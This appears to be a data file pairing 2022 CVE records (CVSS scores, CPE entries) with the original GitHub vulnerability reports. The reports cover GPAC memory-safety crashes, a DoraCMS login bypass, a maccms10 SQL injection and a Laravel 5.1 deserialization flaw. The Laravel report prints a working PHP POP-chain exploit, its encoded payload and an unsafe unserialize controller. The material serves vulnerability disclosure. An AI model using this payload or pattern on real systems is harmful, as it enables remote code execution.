gf_isom_box_array_read isomedia/box_funcs.c:1753 #5 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #6 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #7 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #8 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #9 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #10 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #11 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #12 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #13 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #14 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #15 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #16 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #17 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #18 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #19 0x7fbba8302a35 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #20 0x7fbba832babc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:373 #21 0x7fbba8331c2f in gf_isom_parse_movie_boxes isomedia/isom_intern.c:860 #22 0x7fbba8331c2f in gf_isom_open_file isomedia/isom_intern.c:980 #23 0x55f3db00c549 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6181 #24 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308 previously allocated by thread T0 here: #0 0x7fbbab634808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x7fbba82521ef in unkn_box_read isomedia/box_code_base.c:768 #2 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #3 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #4 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #5 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #6 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #7 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #8 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #9 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #10 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #11 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #12 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #13 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #14 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #15 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #16 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #17 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #18 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #19 0x7fbba8302a35 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #20 0x7fbba832babc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:373 #21 0x7fbba8331c2f in gf_isom_parse_movie_boxes isomedia/isom_intern.c:860 #22 0x7fbba8331c2f in gf_isom_open_file isomedia/isom_intern.c:980 #23 0x55f3db00c549 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6181 #24 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-use-after-free isomedia/avc_ext.c:2490 in gf_isom_dovi_config_get Shadow bytes around the buggy address: 0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa =>0x0c1e7fff8020: fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd 0x0c1e7fff8030: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa 0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2234976==ABORTING ``` **Impact** can cause a program to crash, use unexpected values, or execute code. Occurrences: avc_ext.c:2490 ps: this test was still based on the newest mp4box+asan. The bug happened in avc_ext.c:2490 which was the same location with the other issue i submitted (https://github.com/gpac/gpac/issues/2218). Maybe asan mistakenly reports "heap-use-after-free" instead of "heap-buffer-overflow". Pls check it again.
Heap Use After Free in function gf_isom_dovi_config_get
https://api.github.com/repos/gpac/gpac/issues/2220/comments
1
2022-07-06T03:36:02Z
2022-07-12T17:13:50Z
https://github.com/gpac/gpac/issues/2220
1,295,074,577
2,220
3,986
CVE-2022-36191
2022-08-17T16:15:07.920
A heap-buffer-overflow had occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2490, as demonstrated by MP4Box. This vulnerability was fixed in commit fef6242.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2218" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2218" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2218
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Description** A heap-buffer-overflow has occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2490 when running program MP4Box,this can reproduce on the lattest commit. **version info** ``` fuzz@ubuntu:~/gpac2.1/gpac/bin/gcc$ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **crash command** ` ./MP4Box -info poc1` **crash output** ``` [iso file] Unknown box type 00000200 in parent stsd # Movie Info - 1 track - TimeScale 1000 Duration 00:00:10.000 (recomputed 4 Days, 14:43:47.879) Fragmented: no Major Brand mp4@ - version 0 - compatible brands: mp42 mp41 isom iso2 Created: GMT Thu Apr 26 09:02:13 2012 # Track 1 Info - ID 1 - TimeScale 3000 Media Duration 00:00:10.000 (recomputed 4 Days, 14:43:47.879) Track flags: Enabled In Movie In Preview Media Info: Language "Undetermined (und)" - Type "vide:00000200" - 300 samples Visual Sample Entry Info: width=320 height=240 (depth=24 bits) Visual Track layout: x=0 y=0 width=320 height=240 ================================================================= ==2235126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f000000130 at pc 0x7ff2a69b3bc0 bp 0x7fff43da89f0 sp 0x7fff43da89e0 READ of size 8 at 0x60f000000130 thread T0 #0 0x7ff2a69b3bbf in gf_isom_dovi_config_get isomedia/avc_ext.c:2490 #1 0x56165102107a in DumpTrackInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:2862 #2 0x56165102ea17 in DumpMovieInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:3994 #3 0x561651002ad0 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6367 #4 0x7ff2a4071082 in __libc_start_main ../csu/libc-start.c:308 #5 0x561650fd7afd in _start (/home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box+0xa2afd) Address 0x60f000000130 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/avc_ext.c:2490 in gf_isom_dovi_config_get Shadow bytes around the buggy address: 0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa =>0x0c1e7fff8020: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa 0x0c1e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2235126==ABORTING ``` **source code** ``` 2481 GF_DOVIDecoderConfigurationRecord *gf_isom_dovi_config_get(GF_ISOFile* the_file, u32 trackNumber, u32 DescriptionIndex) 2482 { 2483 GF_TrackBox* trak; 2484 GF_MPEGVisualSampleEntryBox *entry; 2485 trak = gf_isom_get_track_from_file(the_file, trackNumber); 2486 if (!trak || !trak->Media || !DescriptionIndex) return NULL; 2487 entry = (GF_MPEGVisualSampleEntryBox*)gf_list_get(trak->Media->information->sampleTable->SampleDescription->child_boxes, DescriptionIndex - 1); 2488 if (!entry) return NULL; 2489 if (entry->internal_type != GF_ISOM_SAMPLE_ENTRY_VIDEO) return NULL; 2490 if (!entry->dovi_config) return NULL; /**here**/ 2491 return DOVI_DuplicateConfig(&entry->dovi_config->DOVIConfig); 2492 } ``` **sample poc:** [poc1.zip](https://github.com/gpac/gpac/files/9038477/poc1.zip) ps: it is similar with the issue which occured in older gpac version ( https://github.com/gpac/gpac/issues/1846) . The bug was not patched . It still occured in the newest version.
heap-buffer-overflow in function gf_isom_dovi_config_get
https://api.github.com/repos/gpac/gpac/issues/2218/comments
0
2022-07-04T10:10:00Z
2022-07-12T17:13:10Z
https://github.com/gpac/gpac/issues/2218
1,292,941,893
2,218
3,987
CVE-2022-2870
2022-08-17T19:15:07.497
A vulnerability was found in laravel 5.1 and classified as problematic. This issue affects some unknown processing. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206501 was assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 0.7, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/beicheng-maker/vulns/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.206501" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/beicheng-maker/vulns/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.206501" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:*", "matchCriteriaId": "3794CF34-E1D7-4E1A-808E-D5AA4C2154E0", "versionEndExcluding": null, "versionEndIncluding": "5.1.46", "versionStartExcluding": null, "versionStartIncluding": "5.1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/beicheng-maker/vulns/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "beicheng-maker", "vulns" ]
# Laravel 5.1 POP Chain `composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"` `app/Http/Controllers/UsersController.php adding a controller UsersController` ```php <?php namespace App\Http\Controllers; use Illuminate\Http\Request; class UsersController extends Controller { /** * 创建一个新用户。 * * @param Request $request * @return Response */ public function store(Request $request) { echo "Please post cmd to unserialize"; $payload=$request->input("cmd"); unserialize($payload); // } } ?> ``` routes/web.php `Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);` ```php <?php use Illuminate\Support\Facades\Route; /* |-------------------------------------------------------------------------- | Web Routes |-------------------------------------------------------------------------- | | Here is where you can register web routes for your application. These | routes are loaded by the RouteServiceProvider within a group which | contains the "web" middleware group. Now create something great! | */ Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']); ``` ## EXP ```php <?php namespace Illuminate\Auth; class RequestGuard{ protected $provider; protected $callback; protected $request; public function __construct(){ $this->callback = 'call_user_func'; $this->request = 'system'; $this->provider = 'calc'; } } namespace Illuminate\View; use Illuminate\Auth\RequestGuard; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new RequestGuard,'user']; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?> ``` `O%3A42%3A%22SebastianBergmann%5CRecursionContext%5CContext%22%3A1%3A%7Bs%3A50%3A%22%00SebastianBergmann%5CRecursionContext%5CContext%00arrays%22%3BO%3A42%3A%22Illuminate%5CView%5CInvokableComponentVariable%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00callable%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A28%3A%22Illuminate%5CAuth%5CRequestGuard%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00provider%22%3Bs%3A8%3A%22calc.exe%22%3Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A14%3A%22call_user_func%22%3Bs%3A10%3A%22%00%2A%00request%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A4%3A%22user%22%3B%7D%7D%7D` ![image](https://user-images.githubusercontent.com/63102521/185026805-d085e75b-2cf3-44d8-a09e-6024b685e6e0.png)
Laravel5.1 Unserialize RCE
https://api.github.com/repos/beicheng-maker/vulns/issues/2/comments
4
2022-08-17T03:15:09Z
2022-08-26T04:08:54Z
https://github.com/beicheng-maker/vulns/issues/2
1,341,109,531
2
3,988
CVE-2022-35147
2022-08-17T21:15:09.520
DoraCMS v2.18 and earlier allows attackers to bypass login authentication via a crafted HTTP request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/doramart/DoraCMS/issues/256" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/doramart/DoraCMS/issues/256" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:html-js:doracms:*:*:*:*:*:*:*:*", "matchCriteriaId": "B936DD6A-24A5-44AB-965B-5F9D26E1714A", "versionEndExcluding": null, "versionEndIncluding": "2.1.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/doramart/DoraCMS/issues/256
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "doramart", "DoraCMS" ]
There is login bypass in doracms2.18 and earlier versions. When logging in, you can bypass the login user authentication by replacing the return package with the return package after a system successfully logs in. [Vulnerability proof] Step 1:Log in to the system through the default account doracms and record the returned package. ![image](https://user-images.githubusercontent.com/71998676/176827502-02d609e6-684e-47ad-afe4-a29785b770c9.png) Step 2:Use this return package to log in to other doracms systems. ![image](https://user-images.githubusercontent.com/71998676/176828689-372d7993-f802-4d7f-a21a-80436a3da148.png) ![image](https://user-images.githubusercontent.com/71998676/176828728-da1878f1-a59b-4902-968a-9af2fe363fff.png) Step 3:Successfully bypassed login to enter the system. ![image](https://user-images.githubusercontent.com/71998676/176828974-63622a26-4497-4f6c-bf24-a0e502ab4a4b.png)
There is login bypass in doracms
https://api.github.com/repos/doramart/DoraCMS/issues/256/comments
1
2022-07-01T05:50:13Z
2022-08-23T08:23:40Z
https://github.com/doramart/DoraCMS/issues/256
1,290,941,924
256
3,989
CVE-2022-35148
2022-08-17T21:15:09.563
maccms10 v2021.1000.1081 to v2022.1000.3031 was discovered to contain a SQL injection vulnerability via the table parameter at database/columns.html.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/931" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms10/issues/931" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2021.1000.1081:*:*:*:*:*:*", "matchCriteriaId": "A7049FDA-9118-418C-9816-E2627C341D8F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.1099:*:*:*:*:*:*", "matchCriteriaId": "1E3AD4C3-5452-4A33-B426-B0CBF2D56EAD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3001:*:*:*:*:*:*", "matchCriteriaId": "6FF6ADDF-1480-4A46-938E-C17BD227BEAE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3002:*:*:*:*:*:*", "matchCriteriaId": "41E368B4-0B48-418B-923D-8368E3DC2372", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3004:*:*:*:*:*:*", "matchCriteriaId": "7CDE0C52-4110-4A3B-BDF4-09D860C0F96F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3005:*:*:*:*:*:*", "matchCriteriaId": "24CB165C-5EF3-4555-8907-80411877364D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3025:*:*:*:*:*:*", "matchCriteriaId": "23181A63-9B13-42CF-A557-46CC4170CA35", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3026:*:*:*:*:*:*", "matchCriteriaId": "72466714-0BC2-4225-9A1D-FCF1698F6B52", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3027:*:*:*:*:*:*", "matchCriteriaId": "370FB13E-4AFD-4A8D-A7F3-D9DB76C15FBC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3028:*:*:*:*:*:*", "matchCriteriaId": "6F7CACDA-7E15-4C09-A872-06DBDD5100B4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3029:*:*:*:*:*:*", "matchCriteriaId": "7B355B68-FF2D-4638-9818-E93D5308B6A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3030:*:*:*:*:*:*", "matchCriteriaId": "0A8C9537-F79F-4D75-8934-C5E2B55F88F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:maccms:maccms:10.0:2022.1000.3031:*:*:*:*:*:*", "matchCriteriaId": "8920192D-D202-4B0A-B035-0D3B81727CE0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/magicblack/maccms10/issues/931
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "magicblack", "maccms10" ]
Vulnerability name:SQL injection Vulnerability level:Medium risk Affected version:v2021.1000.1081<=v2022.1000.3031 Vulnerability location: Log in to the background and click the database function module to select the data batch replacement function ![Image](https://user-images.githubusercontent.com/28795365/176849280-f767d15e-cd7c-4b67-8efc-bc84fb83eb20.png) ![Image](https://user-images.githubusercontent.com/28795365/176849369-361d7eb1-f38f-4dac-8695-f530c2ca1856.png) Intercept selection data table ![Image](https://user-images.githubusercontent.com/28795365/176849431-efde3c3a-a240-4a86-8589-42c5ad30b1ab.png) Enter payload to attack ![Image](https://user-images.githubusercontent.com/28795365/176849454-72574958-3b5b-4c30-8daf-a530e1b8df1e.png) Audit the code. There is no restriction on the type and length of the parameter tables, and there is no token verification ![Image](https://user-images.githubusercontent.com/28795365/176849485-060f5b16-05c4-4dda-9b3e-6568441166a4.png) This vulnerability can obtain a large amount of data ![Image](https://user-images.githubusercontent.com/28795365/176849518-7a04d93b-6b86-478b-ba22-a1ece2bac901.png)
SQL injection vulnerability in maccms10 background
https://api.github.com/repos/magicblack/maccms10/issues/931/comments
1
2022-07-01T07:48:29Z
2022-07-14T08:58:38Z
https://github.com/magicblack/maccms10/issues/931
1,291,044,406
931
3,990
CVE-2022-35151
2022-08-17T22:15:08.873
kkFileView v4.1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/366" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/366" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3CF7B3A0-ACE8-4EF5-AF51-760E7B2650BF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/kekingcn/kkFileView/issues/366
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kekingcn", "kkFileView" ]
